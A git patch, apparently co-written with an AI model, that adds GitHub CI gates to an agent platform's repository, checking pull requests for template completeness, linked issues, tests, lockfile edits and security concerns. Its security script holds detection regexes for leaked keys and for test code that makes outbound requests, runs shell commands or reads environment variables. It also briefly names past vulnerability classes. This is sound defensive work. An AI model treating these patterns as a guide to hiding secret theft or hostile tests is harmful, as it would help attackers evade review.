From 96feaa331ab8d398cf420873d6085b69b69f6b85 Mon Sep 17 00:00:00 2001
From: brandonburr <brandonburr@gmail.com>
Date: Mon, 1 Jun 2026 10:52:53 -0600
Subject: [PATCH] feat(commitperclip): add automated PR quality and security
 gates (#6469)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Fixes #6470

## Thinking Path

> - Paperclip is an open-source AI agent platform receiving a high
volume of community PRs — currently 2,398 open
> - The contributor experience is broken: PRs sit for months with no
feedback, contributors don't know why they're stuck, and maintainers
spend review time on PRs that are missing basics
> - Common problems: no linked issue, no test coverage, incomplete PR
template, manually-edited lockfile — all catchable before human review
> - At the same time, accepting untrusted PRs from unknown contributors
is a real attack surface: malicious packages, secret injection,
tampering with CI scripts, and code touching the sensitive paths from
the April security advisories
> - This PR adds automated gates that run on every PR: quality failures
get a clear comment telling contributors exactly what to fix, security
concerns are silently flagged as draft advisories and block merge via a
pending check run
> - The benefit is a dramatically faster feedback loop for good-faith
contributors and a meaningful security layer for the maintainers
reviewing them

## What Changed

- **`.github/workflows/commitperclip-review.yml`** — new workflow using
`pull_request_target` (runs in base branch context, has secrets, never
executes PR code). Runs quality gates + security gates on every PR
open/update.
- **`.github/dependabot.yml`** — weekly automated dependency
vulnerability PRs for npm and GitHub Actions.
- **`.github/scripts/get-bot-token.mjs`** — generates a short-lived
commitperclip installation token from `COMMITPERCLIP_KEY` secret.
- **`.github/scripts/run-quality-gates.mjs`** — orchestrates 5 quality
gates, posts/updates a single consolidated comment on the PR.
- **`.github/scripts/check-pr-template.mjs`** — validates all 5 required
template sections, Thinking Path depth (≥3 sentences), Model Used not
placeholder.
- **`.github/scripts/check-pr-linked-issue.mjs`** — requires `Fixes
#NNN` or issue URL in PR body.
- **`.github/scripts/check-pr-test-coverage.mjs`** — requires at least
one test file in the diff.
- **`.github/scripts/check-pr-lockfile.mjs`** — blocks manual
`pnpm-lock.yaml` edits (only the refresh bot may change it).
- **`.github/scripts/check-pr-dependencies.mjs`** — informational
comment when new npm packages are added.
- **`.github/scripts/check-pr-security.mjs`** — 6 silent security
checks: secret patterns, CI workflow tampering, build script changes,
supply chain (new packages in lockfile), suspicious test patterns
(outbound network/shell exec/env var reads), and changes to the 9
sensitive path prefixes from the April advisories. When any fire:
creates a draft security advisory + sets `security-review` check to
`in_progress` (blocks merge). When clean: sets `security-review` to
`success`.
- **`actions/dependency-review-action@v4`** — per-PR dependency
vulnerability check (fails if new dep has known CVE).
- **44 unit tests** across all gate modules (`node:test`, no external
deps).

## Verification

Run all unit tests locally:
```bash
node --test .github/scripts/tests/*.test.mjs
```
Expected: 44 pass, 0 fail.

End-to-end: open a PR missing the template, linked issue, and test files
→ commitperclip posts a consolidated comment listing all failures. Open
a PR with all gates satisfied → `✅ All checks passing` comment posted,
all check runs green.

## Risks

**`pull_request_target` security model:** This workflow runs in base
branch context and has access to secrets. It explicitly checks out `ref:
master` (never PR code) and reads the PR diff via GitHub API only — no
PR code is ever executed. This is the correct pattern for running
secret-bearing checks on fork PRs; deviating from it (e.g. checking out
the PR branch) would be a security vulnerability.

**False positives on security gates:** The sensitive-path gate flags any
PR touching the 9 path prefixes from the April advisories. Legitimate
fixes to those paths will trigger draft advisories. This is intentional
— those paths warrant a human look regardless. The `security-review`
check can be manually resolved by a maintainer once reviewed.

**commitperclip not yet installed:** Until the app is installed on this
repo and the `COMMITPERCLIP_KEY` secret is added, the workflow will fail
on the token generation step. The quality gate comment won't post, but
Dependency Review will still run independently.

## Model Used

Claude Sonnet 4.5, 200k context window, extended thinking enabled, tool
use: read/edit files, bash execution, GitHub API calls

## Checklist

- [x] I have included a thinking path that traces from project context
to this change
- [x] I have specified the model used (with version and capability
details)
- [x] I have checked ROADMAP.md and confirmed this PR does not duplicate
planned core work
- [x] I have run tests locally and they pass (44/44)
- [x] I have added or updated tests where applicable (44 unit tests
across all gate modules)
- [ ] If this change affects the UI, I have included before/after
screenshots (N/A — CI only)
- [x] I have updated relevant documentation to reflect my changes
- [x] I have considered and documented any risks above
- [x] I will address all Greptile and reviewer comments before
requesting merge

---

## One-time setup needed from you, Dotta

1. **Install commitperclip app** on this repo:
https://github.com/apps/commitperclip/installations/new
2. **Add `COMMITPERCLIP_KEY`** as a repository secret (Actions →
Secrets) — ask @brandonburr for the key
3. **Add `security_advisories: write` and `checks: write`** to the
commitperclip app permissions (commit-capital org → Settings → Apps →
commitperclip → Permissions)
4. **Install Socket.dev** from GitHub Marketplace for supply chain
scanning
5. **Branch protection** (optional but recommended): require
`commitperclip-review` and `security-review` checks to pass before merge

## Dashboard integration note

The `commitperclip-review` check run result maps cleanly to your PR
triage dashboard. A single filter on your Worker:

```javascript
const gatesCheck = checkRuns.find(r => r.name === 'commitperclip-review');
if (gatesCheck?.conclusion === 'failure') return null; // filter from queue
```

For security flags: `GET
/repos/paperclipai/paperclip/security-advisories?state=draft` — advisory
titles include `PR #NNN` for cross-referencing. PRs with a matching
draft advisory have `security-review` in `in_progress` state (grey
spinner, can't merge via branch protection).

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: Devin Foley <devin@devinfoley.com>
Co-authored-by: Paperclip <noreply@paperclip.ing>
---
 .github/dependabot.yml                        |  23 ++
 .github/scripts/check-pr-dependencies.mjs     |  89 +++++
 .github/scripts/check-pr-linked-issue.mjs     |  53 +++
 .github/scripts/check-pr-lockfile.mjs         |  31 ++
 .github/scripts/check-pr-security.mjs         | 350 ++++++++++++++++++
 .github/scripts/check-pr-template.mjs         |  88 +++++
 .github/scripts/check-pr-test-coverage.mjs    |  83 +++++
 .github/scripts/fetch-pr-files.mjs            |  21 ++
 .github/scripts/get-bot-token.mjs             | 113 ++++++
 .github/scripts/run-quality-gates.mjs         | 145 ++++++++
 .../tests/check-pr-dependencies.test.mjs      |  65 ++++
 .../tests/check-pr-linked-issue.test.mjs      | 111 ++++++
 .../scripts/tests/check-pr-lockfile.test.mjs  |  33 ++
 .../scripts/tests/check-pr-security.test.mjs  | 316 ++++++++++++++++
 .../scripts/tests/check-pr-template.test.mjs  | 123 ++++++
 .../tests/check-pr-test-coverage.test.mjs     | 101 +++++
 .github/scripts/tests/fetch-pr-files.test.mjs |  37 ++
 .github/scripts/tests/get-bot-token.test.mjs  |  33 ++
 .../scripts/tests/run-quality-gates.test.mjs  |  43 +++
 .github/workflows/commitperclip-review.yml    |  69 ++++
 .gitignore                                    |   2 +
 21 files changed, 1929 insertions(+)
 create mode 100644 .github/dependabot.yml
 create mode 100644 .github/scripts/check-pr-dependencies.mjs
 create mode 100644 .github/scripts/check-pr-linked-issue.mjs
 create mode 100644 .github/scripts/check-pr-lockfile.mjs
 create mode 100644 .github/scripts/check-pr-security.mjs
 create mode 100644 .github/scripts/check-pr-template.mjs
 create mode 100644 .github/scripts/check-pr-test-coverage.mjs
 create mode 100644 .github/scripts/fetch-pr-files.mjs
 create mode 100644 .github/scripts/get-bot-token.mjs
 create mode 100644 .github/scripts/run-quality-gates.mjs
 create mode 100644 .github/scripts/tests/check-pr-dependencies.test.mjs
 create mode 100644 .github/scripts/tests/check-pr-linked-issue.test.mjs
 create mode 100644 .github/scripts/tests/check-pr-lockfile.test.mjs
 create mode 100644 .github/scripts/tests/check-pr-security.test.mjs
 create mode 100644 .github/scripts/tests/check-pr-template.test.mjs
 create mode 100644 .github/scripts/tests/check-pr-test-coverage.test.mjs
 create mode 100644 .github/scripts/tests/fetch-pr-files.test.mjs
 create mode 100644 .github/scripts/tests/get-bot-token.test.mjs
 create mode 100644 .github/scripts/tests/run-quality-gates.test.mjs
 create mode 100644 .github/workflows/commitperclip-review.yml

diff --git a/.github/dependabot.yml b/.github/dependabot.yml
new file mode 100644
index 00000000..ff0b3514
--- /dev/null
+++ b/.github/dependabot.yml
@@ -0,0 +1,23 @@
+version: 2
+updates:
+  - package-ecosystem: npm
+    directory: "/"
+    schedule:
+      interval: weekly
+      day: monday
+      time: "06:00"
+    open-pull-requests-limit: 10
+    labels:
+      - "dependencies"
+    ignore:
+      # Ignore major version bumps — review those manually
+      - dependency-name: "*"
+        update-types: ["version-update:semver-major"]
+
+  - package-ecosystem: github-actions
+    directory: "/"
+    schedule:
+      interval: weekly
+      day: monday
+      time: "06:00"
+    open-pull-requests-limit: 5
diff --git a/.github/scripts/check-pr-dependencies.mjs b/.github/scripts/check-pr-dependencies.mjs
new file mode 100644
index 00000000..c31ed3e4
--- /dev/null
+++ b/.github/scripts/check-pr-dependencies.mjs
@@ -0,0 +1,89 @@
+#!/usr/bin/env node
+/**
+ * check-pr-dependencies.mjs
+ * Detects new npm packages added in this PR vs. the base branch.
+ * Never fails (informational only) — outputs { passed: true, informational: string[] }
+ */
+import { fileURLToPath } from 'node:url';
+import { ghFetch } from './get-bot-token.mjs';
+
+function buildContentsPath(repo, filename, ref) {
+  return `/repos/${repo}/contents/${filename}?${new URLSearchParams({ ref }).toString()}`;
+}
+
+export async function resolveBaseRef(fetchFromGitHub, token, repo, prNumber, baseRef) {
+  if (baseRef) {
+    return baseRef;
+  }
+
+  const pr = await fetchFromGitHub(`/repos/${repo}/pulls/${prNumber}`, token);
+  if (pr.base?.ref) {
+    return pr.base.ref;
+  }
+
+  const repository = await fetchFromGitHub(`/repos/${repo}`, token);
+  if (repository.default_branch) {
+    return repository.default_branch;
+  }
+
+  throw new Error(`Unable to resolve a base branch for ${repo}#${prNumber}.`);
+}
+
+export async function checkDependencies(files, token, repo, prNumber, baseRef, fetchFromGitHub = ghFetch) {
+  const pkgFiles = files.filter(
+    f => f.filename.endsWith('package.json') &&
+         !f.filename.includes('node_modules') &&
+         f.status !== 'removed'
+  );
+
+  if (pkgFiles.length === 0) return { passed: true, informational: [] };
+
+  const resolvedBaseRef = await resolveBaseRef(fetchFromGitHub, token, repo, prNumber, baseRef);
+  const newPackages = new Set();
+
+  for (const file of pkgFiles) {
+    try {
+      const [baseRes, prRes] = await Promise.all([
+        fetchFromGitHub(buildContentsPath(repo, file.filename, resolvedBaseRef), token),
+        fetchFromGitHub(buildContentsPath(repo, file.filename, `refs/pull/${prNumber}/head`), token),
+      ]);
+
+      const basePkg = JSON.parse(Buffer.from(baseRes.content, 'base64').toString());
+      const prPkg = JSON.parse(Buffer.from(prRes.content, 'base64').toString());
+
+      const baseDeps = new Set([
+        ...Object.keys(basePkg.dependencies ?? {}),
+        ...Object.keys(basePkg.devDependencies ?? {}),
+        ...Object.keys(basePkg.peerDependencies ?? {}),
+      ]);
+
+      for (const dep of [
+        ...Object.keys(prPkg.dependencies ?? {}),
+        ...Object.keys(prPkg.devDependencies ?? {}),
+        ...Object.keys(prPkg.peerDependencies ?? {}),
+      ]) {
+        if (!baseDeps.has(dep)) newPackages.add(dep);
+      }
+    } catch {
+      // File may not exist on base — skip
+    }
+  }
+
+  if (newPackages.size === 0) return { passed: true, informational: [] };
+
+  const pkgList = [...newPackages].map(p => `\`${p}\``).join(', ');
+  return {
+    passed: true,
+    informational: [
+      `📦 New dependencies added: ${pkgList}. Review may take longer and new dependencies ` +
+      `are less likely to be accepted — please check if existing deps cover this need.`,
+    ],
+  };
+}
+
+if (process.argv[1] === fileURLToPath(import.meta.url)) {
+  const { GH_TOKEN, GH_REPO, PR_NUMBER, PR_FILES, PR_BASE_REF } = process.env;
+  const files = JSON.parse(PR_FILES ?? '[]');
+  const result = await checkDependencies(files, GH_TOKEN, GH_REPO, PR_NUMBER, PR_BASE_REF);
+  console.log(JSON.stringify(result));
+}
diff --git a/.github/scripts/check-pr-linked-issue.mjs b/.github/scripts/check-pr-linked-issue.mjs
new file mode 100644
index 00000000..865b8865
--- /dev/null
+++ b/.github/scripts/check-pr-linked-issue.mjs
@@ -0,0 +1,53 @@
+#!/usr/bin/env node
+/**
+ * check-pr-linked-issue.mjs
+ * Checks that a PR body references a GitHub issue. Respects conventional commit
+ * prefixes — skips check for docs/chore/build/ci/style/test prefixed PRs.
+ * Export: checkLinkedIssue(prBody: string, prTitle: string) → { passed, failures }
+ */
+import { fileURLToPath } from 'node:url';
+
+const ISSUE_PATTERNS = [
+  /(?:fixes|closes|resolves)\s+#\d+/i,
+  /(?:^|[\s(])https:\/\/github\.com\/paperclipai\/paperclip\/issues\/\d+(?=$|[\s),:;!?]|[.](?![\w-]))/i,
+  /(?<!\w)#\d+/,
+];
+
+// Prefixes where a linked issue is NOT required
+const SKIP_ISSUE_PREFIXES = ['docs', 'chore', 'build', 'ci', 'style', 'test', 'revert'];
+
+function parsePrefix(title) {
+  if (!title) return null;
+  const match = title.match(/^([a-z]+)(?:\([^)]*\))?:/);
+  return match ? match[1].toLowerCase() : null;
+}
+
+export function checkLinkedIssue(body, prTitle = '') {
+  const prefix = parsePrefix(prTitle);
+
+  if (prefix && SKIP_ISSUE_PREFIXES.includes(prefix)) {
+    return { passed: true, failures: [] };
+  }
+
+  if (!body || !body.trim()) {
+    return { passed: false, failures: ['PR body is empty — please fill out the PR template'] };
+  }
+
+  const found = ISSUE_PATTERNS.some(p => p.test(body));
+  return {
+    passed: found,
+    failures: found ? [] : [
+      'No linked issue found — please add `Fixes #NNN` to your PR description. ' +
+      'If no issue exists yet, please file one first: ' +
+      'https://github.com/paperclipai/paperclip/issues/new',
+    ],
+  };
+}
+
+if (process.argv[1] === fileURLToPath(import.meta.url)) {
+  const body = process.env.PR_BODY ?? '';
+  const title = process.env.PR_TITLE ?? '';
+  const result = checkLinkedIssue(body, title);
+  console.log(JSON.stringify(result));
+  process.exit(result.passed ? 0 : 1);
+}
diff --git a/.github/scripts/check-pr-lockfile.mjs b/.github/scripts/check-pr-lockfile.mjs
new file mode 100644
index 00000000..e8352006
--- /dev/null
+++ b/.github/scripts/check-pr-lockfile.mjs
@@ -0,0 +1,31 @@
+#!/usr/bin/env node
+/**
+ * check-pr-lockfile.mjs
+ * Checks that pnpm-lock.yaml was not manually edited.
+ * Export: checkLockfile(files, prAuthor, prBranch) → { passed, failures }
+ */
+import { fileURLToPath } from 'node:url';
+
+export function checkLockfile(files, prAuthor, prBranch) {
+  const lockfileChanged = files.some(f => f.filename === 'pnpm-lock.yaml');
+  if (!lockfileChanged) return { passed: true, failures: [] };
+
+  const isRefreshBot =
+    prAuthor === 'github-actions[bot]' && prBranch === 'chore/refresh-lockfile';
+
+  return {
+    passed: isRefreshBot,
+    failures: isRefreshBot ? [] : [
+      'You have changes to `pnpm-lock.yaml` — `pr.yml` will hard-fail this PR with a confusing message about lockfile edits. ' +
+      'To fix: run `pnpm install` locally, exclude the lockfile from your commit, push again. ' +
+      'The lockfile is regenerated automatically by the refresh bot on a schedule.',
+    ],
+  };
+}
+
+if (process.argv[1] === fileURLToPath(import.meta.url)) {
+  const files = JSON.parse(process.env.PR_FILES ?? '[]');
+  const result = checkLockfile(files, process.env.PR_AUTHOR ?? '', process.env.PR_BRANCH ?? '');
+  console.log(JSON.stringify(result));
+  process.exit(result.passed ? 0 : 1);
+}
diff --git a/.github/scripts/check-pr-security.mjs b/.github/scripts/check-pr-security.mjs
new file mode 100644
index 00000000..8d3ac9ab
--- /dev/null
+++ b/.github/scripts/check-pr-security.mjs
@@ -0,0 +1,350 @@
+#!/usr/bin/env node
+/**
+ * check-pr-security.mjs
+ * Runs 6 security checks against a PR diff. Never posts public comments.
+ * Creates a draft security advisory in the repo if any check fires.
+ *
+ * Env: GH_TOKEN, GH_REPO, PR_NUMBER, PR_AUTHOR
+ * Exit: always 0 — security flags are silent, never block the PR visibly.
+ */
+import { fileURLToPath } from 'node:url';
+import { ghFetch } from './get-bot-token.mjs';
+import { fetchAllPullRequestFiles } from './fetch-pr-files.mjs';
+import { resolveBaseRef } from './check-pr-dependencies.mjs';
+
+// ── Pure check functions (exported for testing) ───────────────────────────────
+
+const SECRET_PATTERNS = [
+  { name: 'OpenAI API key', re: /sk-[a-zA-Z0-9]{32,}/ },
+  { name: 'Google API key', re: /AIza[0-9A-Za-z\-_]{35}/ },
+  { name: 'AWS access key', re: /AKIA[0-9A-Z]{16}/ },
+  { name: 'Private key', re: /-----BEGIN (RSA|EC|OPENSSH) PRIVATE KEY-----/ },
+  { name: 'High-entropy secret', re: /[a-zA-Z_]*(key|token|secret|password|credential)[a-zA-Z_]*\s*[=:]\s*["'][^"']{20,}["']/i },
+];
+
+export function scanSecrets(files) {
+  const flags = [];
+  for (const file of files) {
+    if (!file.patch) continue;
+    const added = file.patch.split('\n').filter(l => l.startsWith('+') && !l.startsWith('+++'));
+    for (const line of added) {
+      for (const { name, re } of SECRET_PATTERNS) {
+        if (re.test(line)) {
+          flags.push({ check: 'secret-scan', file: file.filename, pattern: name, line: line.slice(0, 120) });
+        }
+      }
+    }
+  }
+  return flags;
+}
+
+const CI_BUILD_SCRIPTS = [
+  'scripts/release.sh',
+  'scripts/check-docker-deps-stage.mjs',
+  'scripts/check-release-package-bootstrap.mjs',
+  'scripts/release-package-map.mjs',
+  'scripts/docker-onboard-smoke.sh',
+];
+
+export function scanCITampering(files) {
+  return files
+    .filter(f => f.filename.startsWith('.github/workflows/') && f.status !== 'removed')
+    .map(f => ({ check: 'ci-tampering', file: f.filename }));
+}
+
+export function scanBuildScripts(files) {
+  return files
+    .filter(f => CI_BUILD_SCRIPTS.includes(f.filename) && f.status !== 'removed')
+    .map(f => ({ check: 'build-script-change', file: f.filename }));
+}
+
+export function scanSupplyChain(files) {
+  const lockfile = files.find(f => f.filename === 'pnpm-lock.yaml');
+  if (!lockfile?.patch) return [];
+
+  const added = new Set();
+  const removed = new Set();
+
+  for (const line of lockfile.patch.split('\n')) {
+    const entry = parseLockfilePackageDiffEntry(line);
+    if (!entry) continue;
+    if (entry.sign === '+') added.add(entry.packageName);
+    if (entry.sign === '-') removed.add(entry.packageName);
+  }
+
+  const netNew = [...added].filter(p => !removed.has(p));
+  return netNew.length ? [{ check: 'supply-chain', packages: netNew }] : [];
+}
+
+function parseLockfilePackageDiffEntry(line) {
+  const match = line.match(/^([+-])\s*(.+?)\s*$/);
+  if (!match) return null;
+
+  let [, sign, rawEntry] = match;
+  if (!rawEntry.endsWith(':')) return null;
+
+  rawEntry = rawEntry.slice(0, -1).trim();
+  if ((rawEntry.startsWith("'") && rawEntry.endsWith("'")) || (rawEntry.startsWith('"') && rawEntry.endsWith('"'))) {
+    rawEntry = rawEntry.slice(1, -1);
+  }
+  rawEntry = rawEntry.replace(/\(.*$/, '').trim();
+
+  const versionSep = rawEntry.lastIndexOf('@');
+  if (versionSep <= 0 || versionSep === rawEntry.length - 1) return null;
+
+  const packageName = rawEntry.slice(0, versionSep);
+  if (!/^(?:@[^/\s:]+\/)?[A-Za-z0-9._-][A-Za-z0-9._/-]*$/.test(packageName)) return null;
+
+  return { sign, packageName };
+}
+
+const TEST_FILE_RE = /\.(test|spec)\.(ts|js|tsx|jsx)$|\/(?:__tests__|tests?)\//;
+const SUSPICIOUS_PATTERNS = [
+  { name: 'outbound-network', re: /\+.*(fetch\(|axios\.|http\.request|https\.request)/ },
+  { name: 'env-var-read', re: /\+.*process\.env\.(?!(?:NODE_ENV|CI|TEST|VITEST|npm_))([A-Z_]{4,})/ },
+  { name: 'shell-exec', re: /\+.*(execSync\(|spawnSync\(|exec\(|spawn\()/ },
+  { name: 'absolute-file-read', re: /\+.*(readFile|readFileSync)\s*\(\s*["'`]?\// },
+];
+
+export function scanTestPatterns(files) {
+  const flags = [];
+  for (const file of files) {
+    if (!TEST_FILE_RE.test(file.filename) || !file.patch) continue;
+    for (const { name, re } of SUSPICIOUS_PATTERNS) {
+      if (re.test(file.patch)) {
+        flags.push({ check: 'suspicious-test', file: file.filename, pattern: name });
+      }
+    }
+  }
+  return flags;
+}
+
+const SENSITIVE_PATHS = [
+  // Advisory 1: codex-local adapter (inherited ChatGPT/Gmail OAuth scopes)
+  'packages/adapters/codex-local/',
+  // Advisory 2 & 11: OS command injection / privilege escalation via provisionCommand / cleanupCommand
+  'server/src/services/workspace-realization.ts',
+  'server/src/routes/execution-workspaces.ts',
+  'server/src/routes/workspace-command-authz.ts',
+  // Advisory 3 & 6: Cross-tenant agent API key minting and IDOR on /agents/:id/keys
+  'server/src/routes/agents.ts',
+  // Advisory 4: Approval decision attribution spoofing via decidedByUserId
+  'server/src/routes/approvals.ts',
+  // Advisory 5: Stored XSS via javascript: URLs in MarkdownBody (urlTransform)
+  'ui/src/components/MarkdownBody.tsx',
+  // Advisory 7: Unauthenticated access to authenticated-mode endpoints
+  'server/src/routes/authz.ts',
+  // Advisory 8: Unauthenticated RCE via import authorization bypass
+  'server/src/routes/companies.ts',
+  // Advisory 9: Malicious skills able to exfiltrate / destroy user data
+  'server/src/routes/company-skills.ts',
+  // Advisory 10: Arbitrary file read via agent-controlled instructionsFilePath
+  'server/src/services/agent-instructions.ts',
+];
+
+export function scanSensitivePaths(files) {
+  return files
+    .filter(f => f.status !== 'removed' && SENSITIVE_PATHS.some(p => f.filename.startsWith(p)))
+    .map(f => ({
+      check: 'sensitive-path',
+      file: f.filename,
+      advisoryPath: SENSITIVE_PATHS.find(p => f.filename.startsWith(p)),
+    }));
+}
+
+function buildContentsPath(repo, filename, ref) {
+  return `/repos/${repo}/contents/${filename}?${new URLSearchParams({ ref }).toString()}`;
+}
+
+export async function validateSensitivePaths(token, repo, prNumber, baseRef, fetchFromGitHub = ghFetch) {
+  const resolvedBaseRef = await resolveBaseRef(fetchFromGitHub, token, repo, prNumber, baseRef);
+  const stale = [];
+  await Promise.all(SENSITIVE_PATHS.map(async (path) => {
+    try {
+      await fetchFromGitHub(buildContentsPath(repo, path, resolvedBaseRef), token);
+    } catch (err) {
+      // 404 means the file/directory no longer exists at this path
+      if (String(err.message).includes('404')) stale.push(path);
+      // Other errors (network, rate limit) — re-throw so we don't silently miss them
+      else throw err;
+    }
+  }));
+  return stale;
+}
+
+// ── Advisory creation ─────────────────────────────────────────────────────────
+
+const SEVERITY_MAP = {
+  'supply-chain': 'critical',
+  'sensitive-path': 'critical',
+  'secret-scan': 'high',
+  'ci-tampering': 'high',
+  'suspicious-test': 'high',
+  'build-script-change': 'medium',
+};
+
+const SEVERITY_ORDER = ['low', 'medium', 'high', 'critical'];
+
+function worstSeverity(flags) {
+  return flags.reduce((worst, f) => {
+    const s = SEVERITY_MAP[f.check] ?? 'medium';
+    return SEVERITY_ORDER.indexOf(s) > SEVERITY_ORDER.indexOf(worst) ? s : worst;
+  }, 'low');
+}
+
+export function buildAdvisoryPayload(prNumber, prTitle, flags) {
+  const checkNames = [...new Set(flags.map(f => f.check))].join(', ');
+  return {
+    summary: `🚨 Security flag — PR #${prNumber}: ${checkNames}`,
+    description: [
+    `**PR:** #${prNumber} — ${prTitle}`,
+    `**Checks triggered:** ${checkNames}`,
+    '',
+    '**Details:**',
+    ...flags.map(f => [
+      `- \`${f.check}\`: ${f.file ?? ''}`,
+      f.pattern ? ` (pattern: ${f.pattern})` : '',
+      f.packages ? ` (packages: ${f.packages.join(', ')})` : '',
+      f.line ? `\n  \`${f.line}\`` : '',
+    ].join('')),
+    '',
+    '> This advisory was created automatically by commitperclip. Review and dismiss if not a real concern.',
+    ].join('\n'),
+    severity: worstSeverity(flags),
+    vulnerabilities: [],
+  };
+}
+
+export async function syncDraftAdvisory(fetchImpl, token, repo, prNumber, prTitle, flags) {
+  const existing = await findExistingDraftAdvisory(fetchImpl, token, repo, prNumber);
+  const payload = buildAdvisoryPayload(prNumber, prTitle, flags);
+
+  if (existing) {
+    const advisoryId = existing.ghsa_id ?? existing.id;
+    if (!advisoryId) {
+      throw new Error(`Existing advisory for PR #${prNumber} is missing both ghsa_id and id.`);
+    }
+
+    return fetchImpl(`/repos/${repo}/security-advisories/${advisoryId}`, token, {
+      method: 'PATCH',
+      headers: { 'Content-Type': 'application/json' },
+      body: JSON.stringify(payload),
+    });
+  }
+
+  return fetchImpl(`/repos/${repo}/security-advisories`, token, {
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json' },
+    body: JSON.stringify(payload),
+  });
+}
+
+export async function findExistingDraftAdvisory(fetchImpl, token, repo, prNumber) {
+  const prMarker = `PR #${prNumber}`;
+
+  for (let page = 1; ; page += 1) {
+    const advisories = await fetchImpl(
+      `/repos/${repo}/security-advisories?state=draft&per_page=100&page=${page}`,
+      token,
+    );
+
+    if (!Array.isArray(advisories) || advisories.length === 0) return null;
+
+    const existing = advisories.find(advisory =>
+      typeof advisory?.summary === 'string' && advisory.summary.includes(prMarker)
+    );
+    if (existing) return existing;
+
+    if (advisories.length < 100) return null;
+  }
+}
+
+export async function postSecurityCheckRun(fetchImpl, token, repo, headSha, hasFlags) {
+  await fetchImpl(`/repos/${repo}/check-runs`, token, {
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json' },
+    body: JSON.stringify(hasFlags ? {
+      name: 'security-review',
+      head_sha: headSha,
+      status: 'in_progress',
+      output: {
+        title: 'Security Review Pending',
+        summary: 'This PR has been flagged for manual security review by a maintainer. No action needed from you.',
+      },
+    } : {
+      name: 'security-review',
+      head_sha: headSha,
+      status: 'completed',
+      conclusion: 'success',
+      output: {
+        title: 'Security Review Passed',
+        summary: 'No security concerns detected.',
+      },
+    }),
+  });
+}
+
+// ── Main ──────────────────────────────────────────────────────────────────────
+
+async function main() {
+  const { GH_TOKEN, GH_REPO, PR_NUMBER } = process.env;
+
+  if (!GH_TOKEN || !GH_REPO || !PR_NUMBER) {
+    console.error('ERROR: GH_TOKEN, GH_REPO, PR_NUMBER required');
+    process.exit(1);
+  }
+
+  // Sanitize inputs before use in URL construction (prevents SSRF)
+  const prNumber = parseInt(PR_NUMBER, 10);
+  if (!Number.isInteger(prNumber) || prNumber <= 0) {
+    console.error('ERROR: PR_NUMBER must be a positive integer');
+    process.exit(1);
+  }
+  if (!/^[a-zA-Z0-9_.-]+\/[a-zA-Z0-9_.-]+$/.test(GH_REPO)) {
+    console.error('ERROR: GH_REPO must be in owner/repo format');
+    process.exit(1);
+  }
+
+  // Validate SENSITIVE_PATHS — fails loudly if any have been refactored away on the PR base branch
+  const stalePaths = await validateSensitivePaths(GH_TOKEN, GH_REPO, prNumber);
+  if (stalePaths.length > 0) {
+    console.error('ERROR: Stale sensitive paths in check-pr-security.mjs:');
+    for (const p of stalePaths) console.error(`  - ${p}`);
+    console.error('');
+    console.error('These paths no longer exist on the PR base branch. The security gate will silently produce no signal for them.');
+    console.error('Update SENSITIVE_PATHS in check-pr-security.mjs to reflect the current code structure.');
+    process.exit(1);
+  }
+
+  const [pr, files] = await Promise.all([
+    ghFetch(`/repos/${GH_REPO}/pulls/${prNumber}`, GH_TOKEN),
+    fetchAllPullRequestFiles(ghFetch, GH_REPO, prNumber, GH_TOKEN),
+  ]);
+
+  const allFlags = [
+    ...scanSecrets(files),
+    ...scanCITampering(files),
+    ...scanBuildScripts(files),
+    ...scanSupplyChain(files),
+    ...scanTestPatterns(files),
+    ...scanSensitivePaths(files),
+  ];
+
+  if (allFlags.length > 0) {
+    console.error(`[security] ${allFlags.length} flag(s) detected — creating draft advisory and pending check run`);
+    await Promise.all([
+      syncDraftAdvisory(ghFetch, GH_TOKEN, GH_REPO, prNumber, pr.title, allFlags),
+      postSecurityCheckRun(ghFetch, GH_TOKEN, GH_REPO, pr.head.sha, true),
+    ]);
+  } else {
+    console.log('[security] all clear');
+    await postSecurityCheckRun(ghFetch, GH_TOKEN, GH_REPO, pr.head.sha, false);
+  }
+
+  // Always exit 0 — security flags are silent, never block the PR publicly
+  process.exit(0);
+}
+
+if (process.argv[1] === fileURLToPath(import.meta.url)) {
+  main().catch(e => { console.error(e.message); process.exit(1); });
+}
diff --git a/.github/scripts/check-pr-template.mjs b/.github/scripts/check-pr-template.mjs
new file mode 100644
index 00000000..851ea5cd
--- /dev/null
+++ b/.github/scripts/check-pr-template.mjs
@@ -0,0 +1,88 @@
+#!/usr/bin/env node
+/**
+ * check-pr-template.mjs
+ * Checks that a PR body contains all required sections from the PR template.
+ * Export: checkTemplate(prBody: string) → { passed: boolean, failures: string[] }
+ */
+import { fileURLToPath } from 'node:url';
+
+const REQUIRED_SECTIONS = [
+  { heading: '## Thinking Path', minSentences: 3 },
+  { heading: '## What Changed', minSentences: 1 },
+  { heading: '## Verification', minSentences: 1 },
+  { heading: '## Risks', minSentences: 1 },
+  { heading: '## Model Used', minSentences: 1 },
+];
+
+const MODEL_PLACEHOLDERS = [
+  'provider, model id',
+  'your model',
+  '<model>',
+];
+
+function extractSectionContent(body, heading) {
+  const idx = body.indexOf(heading);
+  if (idx === -1) return null;
+  const after = body.slice(idx + heading.length);
+  const nextHeading = after.search(/\n## /);
+  return (nextHeading === -1 ? after : after.slice(0, nextHeading)).trim();
+}
+
+function countSentences(text) {
+  // Split on terminal punctuation, bullet/quote line starts (`-`, `*`, `>`), or
+  // blank lines so non-prose Thinking Paths (bullet lists, blockquotes) are
+  // counted by item rather than as a single sentence.
+  return text.split(/[.!?]+\s+|\n\s*[-*>]+\s+|\n{2,}/).filter(s => s.trim().length > 5).length;
+}
+
+export function checkTemplate(body) {
+  const failures = [];
+
+  if (!body || !body.trim()) {
+    for (const { heading } of REQUIRED_SECTIONS) {
+      failures.push(`Missing section: **${heading}**`);
+    }
+    return { passed: false, failures };
+  }
+
+  for (const { heading, minSentences } of REQUIRED_SECTIONS) {
+    const content = extractSectionContent(body, heading);
+
+    if (content === null) {
+      failures.push(`Missing section: **${heading}**`);
+      continue;
+    }
+
+    if (!content || content === '_No response_' || /^<!--/.test(content)) {
+      failures.push(`Empty section: **${heading}**`);
+      continue;
+    }
+
+    if (heading === '## Thinking Path') {
+      const n = countSentences(content);
+      if (n < minSentences) {
+        failures.push(
+          `**Thinking Path** needs more detail (${n} sentence${n === 1 ? '' : 's'} — aim for 3+)`
+        );
+      }
